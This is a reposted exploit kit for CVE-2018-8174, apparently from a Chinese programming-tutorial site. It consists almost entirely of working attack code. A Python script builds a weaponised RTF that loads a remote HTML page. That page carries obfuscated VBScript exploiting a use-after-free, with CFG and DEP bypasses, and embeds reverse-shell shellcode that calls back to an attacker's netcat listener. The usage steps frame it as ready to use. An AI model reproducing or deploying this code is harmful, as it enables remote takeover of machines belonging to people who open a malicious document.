CVE-2018-8174 EXP 0day python
时间:2022-06-10
本文章向大家介绍CVE-2018-8174 EXP 0day python,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]
Exploit for CVE-2018-8174
optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat
eg:
- python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
- put exploit.html on your server (1.1.1.1)
- netcat listen on [any] 4444 (2.2.2.2)
enjoy it !
POC:
1 import argparse
2 import struct
3
4 SampleRTF = R"""{rtf1ansiansicpg1252deff0deflang1033{fonttbl{f0fnilfcharset0 Calibri;}}
5 {*generator Msftedit 5.41.21.2510;}viewkind4uc1pardsa200sl276slmult1lang9f0fs22{objectobjautlinkobjupdatersltpictobjw4321objh4321{*objclass htmlfile}{*objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
12 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
19 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
23 UNICODE_URL
24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
26 NORMAL_URL
27 0000bbbbcccc2700
28 UNICODE_URL
29 0000000000000000000000000000000000000000000000000000
30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
32 }par
33 }
34 """
35
36 SampleHTML = R"""
37 <!doctype html>
38 <html lang="en">
39 <head>
40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
41 <meta http-equiv="x-ua-compatible" content="IE=10">
42 <meta http-equiv="Expires" content="0">
43 <meta http-equiv="Pragma" content="no-cache">
44 <meta http-equiv="Cache-control" content="no-cache">
45 <meta http-equiv="Cache" content="no-cache">
46 </head>
47 <body>
48 <script language="vbscript">
49 Dim lIIl
50 Dim IIIlI(6),IllII(6)
51 Dim IllI
52 Dim IIllI(40)
53 Dim lIlIIl,lIIIll
54 Dim IlII
55 Dim llll,IIIIl
56 Dim llllIl,IlIIII
57 Dim NtContinueAddr,VirtualProtectAddr
58 IlII=195948557
59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
61 IllI=195890093
62 Function IIIII(Domain)
63 lIlII=0
64 IllllI=0
65 IIlIIl=0
66 Id=CLng(Rnd*1000000)
67 lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
68 If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
69 lIlII=lIlII-(&h86d+6447-&H219b)
70 End If
71 IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
72 IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
73 IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
74 End Function
75 Function lIIII(ByVal lIlIl)
76 IIll=""
77 For index=0 To Len(lIlIl)-1
78 IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
79 Next
80 IIll=IIll &"00"
81 If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
82 IIll=IIll &"00"
83 End If
84 For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
85 lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
86 lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
87 lIIII=lIIII &"%u" &lIlIll &lIIIlI
88 Next
89 End Function
90 Function lIlI(ByVal Number,ByVal Length)
91 IIII=Hex(Number)
92 If Len(IIII)<Length Then
93 IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
94 Else
95 IIII=Right(IIII,Length)
96 End If
97 lIlI=IIII
98 End Function
99 Function GetUint32(lIII)
100 Dim value
101 llll.mem(IlII+8)=lIII+4
102 llll.mem(IlII)=8 'type string
103 value=llll.P0123456789
104 llll.mem(IlII)=2
105 GetUint32=value
106 End Function
107 Function IllIIl(lIII)
108 IllIIl=GetUint32(lIII) And (131071-65536)
109 End Function
110 Function lllII(lIII)
111 lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
112 End Function
113 Sub llllll
114 End Sub
115 Function GetMemValue
116 llll.mem(IlII)=(&h713+3616-&H1530)
117 GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
118 End Function
119 Sub SetMemValue(ByRef IlIIIl)
120 llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
121 End Sub
122 Function LeakVBAddr
123 On Error Resume Next
124 Dim lllll
125 lllll=llllll
126 lllll=null
127 SetMemValue lllll
128 LeakVBAddr=GetMemValue()
129 End Function
130 Function GetBaseByDOSmodeSearch(IllIll)
131 Dim llIl
132 llIl=IllIll And &hffff0000
133 Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
134 llIl=llIl-65536
135 Loop
136 GetBaseByDOSmodeSearch=llIl
137 End Function
138 Function StrCompWrapper(lIII,llIlIl)
139 Dim lIIlI,IIIl
140 lIIlI=""
141 For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
142 lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
143 Next
144 StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
145 End Function
146 Function GetBaseFromImport(base_address,name_input)
147 Dim import_rva,nt_header,descriptor,import_dir
148 Dim IIIIII
149 nt_header=GetUint32(base_address+(&h3c))
150 import_rva=GetUint32(base_address+nt_header+&h80)
151 import_dir=base_address+import_rva
152 descriptor=0
153 Do While True
154 Dim Name
155 Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
156 If Name=0 Then
157 GetBaseFromImport=&hBAAD0000
158 Exit Function
159 Else
160 If StrCompWrapper(base_address+Name,name_input)=0 Then
161 Exit Do
162 End If
163 End If
164 descriptor=descriptor+1
165 Loop
166 IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
167 GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
168 End Function
169 Function GetProcAddr(dll_base,name)
170 Dim p,export_dir,index
171 Dim function_rvas,function_names,function_ordin
172 Dim Illlll
173 p=GetUint32(dll_base+&h3c)
174 p=GetUint32(dll_base+p+&h78)
175 export_dir=dll_base+p
176 function_rvas=dll_base+GetUint32(export_dir+&h1c)
177 function_names=dll_base+GetUint32(export_dir+&h20)
178 function_ordin=dll_base+GetUint32(export_dir+&h24)
179 index=0
180 Do While True
181 Dim lllI
182 lllI=GetUint32(function_names+index*4)
183 If StrCompWrapper(dll_base+lllI,name)=0 Then
184 Exit Do
185 End If
186 index=index+1
187 Loop
188 Illlll=IllIIl(function_ordin+index*2)
189 p=GetUint32(function_rvas+Illlll*4)
190 GetProcAddr=dll_base+p
191 End Function
192 Function GetShellcode()
193 IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
194 IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
195 GetShellcode=IIlI
196 End Function
197 Function EscapeAddress(ByVal value)
198 Dim High,Low
199 High=lIlI((value And &hffff0000)/&h10000,4)
200 Low=lIlI(value And &hffff,4)
201 EscapeAddress=Unescape("%u" &Low &"%u" &High)
202 End Function
203 Function lIllIl
204 Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
205 IlllI=lIlI(NtContinueAddr,8)
206 IlIII=Mid(IlllI,1,2)
207 llllI=Mid(IlllI,3,2)
208 llIII=Mid(IlllI,5,2)
209 lIllI=Mid(IlllI,7,2)
210 IIlI=""
211 IIlI=IIlI &"%u0000%u" &lIllI &"00"
212 For IIIl=1 To 3
213 IIlI=IIlI &"%u" &llllI &llIII
214 IIlI=IIlI &"%u" &lIllI &IlIII
215 Next
216 IIlI=IIlI &"%u" &llllI &llIII
217 IIlI=IIlI &"%u00" &IlIII
218 lIllIl=Unescape(IIlI)
219 End Function
220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
221 Dim IIlI
222 IIlI=String((100334-65536),Unescape("%u4141"))
223 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
224 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
225 IIlI=IIlI &EscapeAddress(&h3000)
226 IIlI=IIlI &EscapeAddress(&h40)
227 IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
228 IIlI=IIlI &String(6,Unescape("%u4242"))
229 IIlI=IIlI &lIllIl()
230 IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
231 WrapShellcodeWithNtContinueContext=IIlI
232 End Function
233 Function ExpandWithVirtualProtect(lIlll)
234 Dim IIlI
235 Dim lllllI
236 lllllI=lIlll+&h23
237 IIlI=""
238 IIlI=IIlI &EscapeAddress(lllllI)
239 IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
240 IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
241 IIlI=IIlI &EscapeAddress(&h1b)
242 IIlI=IIlI &EscapeAddress(0)
243 IIlI=IIlI &EscapeAddress(lIlll)
244 IIlI=IIlI &EscapeAddress(&h23)
245 IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
246 ExpandWithVirtualProtect=IIlI
247 End Function
248 Sub ExecuteShellcode
249 llll.mem(IlII)=&h4d 'DEP bypass
250 llll.mem(IlII+8)=0
251 msgbox(IlII) 'VT replaced
252 End Sub
253 Class cla1
254 Private Sub Class_Terminate()
255 Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
256 IllI=IllI+(&h14b5+2725-&H1f59)
257 lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
258 End Sub
259 End Class
260 Class cla2
261 Private Sub Class_Terminate()
262 Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
263 IllI=IllI+(&h880+542-&Ha9d)
264 lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
265 End Sub
266 End Class
267 Class IIIlIl
268 End Class
269 Class llIIl
270 Dim mem
271 Function P
272 End Function
273 Function SetProp(Value)
274 mem=Value
275 SetProp=0
276 End Function
277 End Class
278 Class IIIlll
279 Dim mem
280 Function P0123456789
281 P0123456789=LenB(mem(IlII+8))
282 End Function
283 Function SPP
284 End Function
285 End Class
286 Class lllIIl
287 Public Default Property Get P
288 Dim llII
289 P=174088534690791e-324
290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
291 IIIlI(IIIl)=(&h2176+711-&H243d)
292 Next
293 Set llII=New IIIlll
294 llII.mem=lIlIIl
295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
296 Set IIIlI(IIIl)=llII
297 Next
298 End Property
299 End Class
300 Class llllII
301 Public Default Property Get P
302 Dim llII
303 P=636598737289582e-328
304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
305 IllII(IIIl)=(&h442+2598-&He68)
306 Next
307 Set llII=New IIIlll
308 llII.mem=lIIIll
309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
310 Set IllII(IIIl)=llII
311 Next
312 End Property
313 End Class
314 Set llllIl=New lllIIl
315 Set IlIIII=New llllII
316 Sub UAF
317 For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
318 Set IIllI(IIIl)=New IIIlIl
319 Next
320 For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
321 Set IIllI(IIIl)=New llIIl
322 Next
323 IllI=0
324 For IIIl=0 To 6
325 ReDim lIIl(1)
326 Set lIIl(1)=New cla1
327 Erase lIIl
328 Next
329 Set llll=New llIIl
330 IllI=0
331 For IIIl=0 To 6
332 ReDim lIIl(1)
333 Set lIIl(1)=New cla2
334 Erase lIIl
335 Next
336 Set IIIIl=New llIIl
337 End Sub
338 Sub InitObjects
339 llll.SetProp(llllIl)
340 IIIIl.SetProp(IlIIII)
341 IlII=IIIIl.mem
342 End Sub
343 Sub StartExploit
344 UAF
345 InitObjects
346 vb_adrr=LeakVBAddr()
347 // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
348 vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
349 // Alert "VBScript Base: 0x" & Hex(vbs_base)
350 msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
351 // Alert "MSVCRT Base: 0x" & Hex(msv_base)
352 krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
353 // Alert "KernelBase Base: 0x" & Hex(krb_base)
354 ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
355 // Alert "Ntdll Base: 0x" & Hex(ntd_base)
356 VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
357 // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
358 NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
359 // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
360 SetMemValue GetShellcode()
361 ShellcodeAddr=GetMemValue()+8
362 // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
363 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
364 lIlll=GetMemValue()+69596
365 SetMemValue ExpandWithVirtualProtect(lIlll)
366 llIIll=GetMemValue()
367 // Alert "Executing Shellcode"
368 ExecuteShellcode
369 End Sub
370 StartExploit
371 </script>
372 </body>
373 </html>
374 """
375
376 reverseip = '1.1.1.1'
377 reverseport = 4444
378
379 def create_rtf_file(url,filename):
380 NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))
381 UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
382 if len(UNICODE_URL) < 154:
383 print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
384 UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
385 res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
386 f = open(filename, 'w')
387 f.write(res)
388 f.close()
389 print "Generated "+filename+" successfully"
390
391
392 def rev_shellcode(ip,port):
393 ip = [int(i) for i in ip.split(".")]
394 buf = ""
395 buf += "xfcxe9x8ax00x00x00x5dx83xc5x0bx81xc4x70"
396 buf += "xfexffxffx8dx54x24x60x52x68xb1x4ax6bxb1"
397 buf += "xffxd5x8dx44x24x60xebx5cx5ex8dx78x60x57"
398 buf += "x50x31xdbx53x53x68x04x00x00x08x53x53x53"
399 buf += "x56x53x68x79xccx3fx86xffxd5x85xc0x74x59"
400 buf += "x6ax40x80xc7x10x53x53x31xdbx53xffx37x68"
401 buf += "xaex87x92x3fxffxd5x54x68x44x01x00x00xeb"
402 buf += "x39x50xffx37x68xc5xd8xbdxe7xffxd5x53x53"
403 buf += "x53x8bx4cx24xfcx51x53x53xffx37x68xc6xac"
404 buf += "x9ax79xffxd5xe9x41x01x00x00xe8x9fxffxff"
405 buf += "xffx72x75x6ex64x6cx6cx33x32x2ex65x78x65"
406 buf += "x00xe8x71xffxffxffxe8xc2xffxffxffxfcxe8"
407 buf += "x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
408 buf += "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
409 buf += "x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01"
410 buf += "xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4c"
411 buf += "x11x78xe3x48x01xd1x51x8bx59x20x01xd3x8b"
412 buf += "x49x18xe3x3ax49x8bx34x8bx01xd6x31xffxac"
413 buf += "xc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3b"
414 buf += "x7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0c"
415 buf += "x4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44"
416 buf += "x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"
417 buf += "x8bx12xebx8dx5dx68x33x32x00x00x68x77x73"
418 buf += "x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"
419 buf += "x00x00x29xc4x54x50x68x29x80x6bx00xffxd5"
420 buf += "x50x50x50x50x40x50x40x50x68xeax0fxdfxe0"
421 buf += "xffxd5x97x6ax05x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"x68x02x00"
422 buf += struct.pack("!H",port)+"x89xe6x6ax10x56x57x68x99xa5x74x61"
423 buf += "xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0"
424 buf += "xb5xa2x56xffxd5x68x63x6dx64x00x89xe3x57"
425 buf += "x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44"
426 buf += "x24x3cx01x01x8dx44x24x10xc6x00x44x54x50"
427 buf += "x56x56x56x46x56x4ex56x56x53x56x68x79xcc"
428 buf += "x3fx86xffxd5x89xe0x4ex56x46xffx30x68x08"
429 buf += "x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95"
430 buf += "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05"
431 buf += "xbbx47x13x72x6fx6ax00x53xffxd5"
432
433 return buf.encode("hex")
434
435 def gen_shellcode(s):
436 n = len(s)
437 i = 0
438 strs = ''
439 if n % 4 == 2:
440 s=s+'41'
441 while i <n:
442 strs += '%u'+s[i+2:i+4]+s[i:i+2]
443 i+=4
444 return strs
445
446 if __name__ == '__main__':
447 parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
448 parser.add_argument("-u", "--url", help="exp url", required=True)
449 parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
450 parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
451 parser.add_argument('-p', "--port", help="port for netcat", required=False)
452 args = parser.parse_args()
453 url = args.url
454 filename = args.output
455 create_rtf_file(url,filename)
456 if args.ip and args.port:
457 ip = str(args.ip)
458 port = int(args.port)
459 shellcode = gen_shellcode(rev_shellcode(ip,port))
460 else:
461 shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
462 res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
463 f = open('exploit.html', 'w')
464 f.write(res)
465 f.close()
466
467 print "!!! Completed !!!"
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法